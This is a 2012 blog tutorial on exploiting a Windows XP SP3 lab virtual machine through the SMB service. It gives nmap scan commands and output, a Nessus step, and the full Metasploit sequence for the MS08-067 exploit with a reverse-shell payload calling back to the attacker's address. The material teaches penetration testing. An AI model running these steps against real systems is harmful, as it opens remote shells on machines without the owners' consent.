Comments

Pages

Monday, 10 September 2012

Exploitation Windows XP using Metasploit via SMB Service

Posted by at 19:28 Read our previous post
What is Metasploit ?
Metasploit Framework is the best and most advanced exploitation toolkits. Metasploit was developed in Ruby programming language and supports the modularization such that it makes it easier for the penetration tester with optimum programming skills to extend or develop custom plugins and tools.The interface of Metasploit provided CLI, Console, GUI.
How to do that?
  1. Infromation Gatheringy
    We need to collect information of target, for example Windows XP SP3. I will scan target using Nmap.
    Scanning life host
    root@bt# nmap -v -sn 172.16.227.1/24
    result:
    Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-11 21:27 WIT
Initiating ARP Ping Scan at 21:27
Scanning 172.16.227.0 [1 port]
Completed ARP Ping Scan at 21:27, 0.44s elapsed (1 total hosts)
Nmap scan report for 172.16.227.0 [host down]
Initiating Parallel DNS resolution of 1 host. at 21:27
Completed Parallel DNS resolution of 1 host. at 21:27, 0.51s elapsed
Nmap scan report for 172.16.227.1
Host is up.
Initiating ARP Ping Scan at 21:27
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 21:27, 5.46s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 21:27
Completed Parallel DNS resolution of 254 hosts. at 21:27, 0.27s elapsed
Nmap scan report for 172.16.227.2 [host down]
Nmap scan report for 172.16.227.3 [host down]
Nmap scan report for 172.16.227.4 [host down]
Nmap scan report for 172.16.227.5 [host down]
.......
Nmap scan report for 172.16.227.127 [host down]
Nmap scan report for 172.16.227.128
Host is up (0.0037s latency).
MAC Address: 00:50:56:3C:FE:7E (VMware)
Nmap scan report for 172.16.227.129 [host down]
Host is up (0.00014s latency).
MAC Address: 00:50:56:F9:40:9A (VMware)
Nmap scan report for 172.16.227.255 [host down]
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.90 seconds
           Raw packets sent: 508 (14.224KB) | Rcvd: 2 (56B)

    Scanning information of host
    root@bt# nmap -sS -A 172.16.227.128
    result:
    Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-11 22:43 WIT
Nmap scan report for 172.16.227.128
Host is up (0.00098s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE         VERSION
135/tcp  open  msrpc           Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
1111/tcp open  lmsocialserver?
MAC Address: 00:50:56:3C:FE:7E (VMware)
Device type: general purpose
Running: Microsoft Windows 2000|XP|2003
OS CPE: cpe:/o:microsoft:windows_2000::sp2 cpe:/o:microsoft:windows_2000::sp3 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::- cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: FATEH-100, NetBIOS user: , NetBIOS MAC: 00:50:56:3c:fe:7e (VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: fateh-100
|   NetBIOS computer name: FATEH-100
|   Workgroup: FATEHNET
|_  System time: 2012-09-11 22:43:55 UTC+7

TRACEROUTE
HOP RTT     ADDRESS
1   0.98 ms 172.16.227.128
  2. Service Enumeration
    result from Information Gathering:
    135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
  3. Vulnerabillity Assesment
    now, I will use Nessus for VA.
    Run Nessus service
    root@bt# /etc/init.d/nessusd start
    Open address http://bt:8834
    Goto "scan" menu




    Add Scan, fill the target

    Result,

    Now we can see that port 445 is used for SMB service, then we need search for SMB Server exploit.
  4. Exploitation
    Open Metasploit, run using this command
    root@bt# msfconsole
    Search smb exploit using smb keyword,
    search smb
    use the exploit of smb
    use exploit/windows/smb/ms08_067_netapi
    show options
    et your IP target address into RHOST
    set RHOST 172.16.227.128
    show payloads
    then set the payload
    set PAYLOAD windows/shell/reverse_tcp_allports
    now set our IP into LHOST
    set LHOST 172.16.227.1
    finally, run the exploit command
    exploit


Posted by shinigami at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template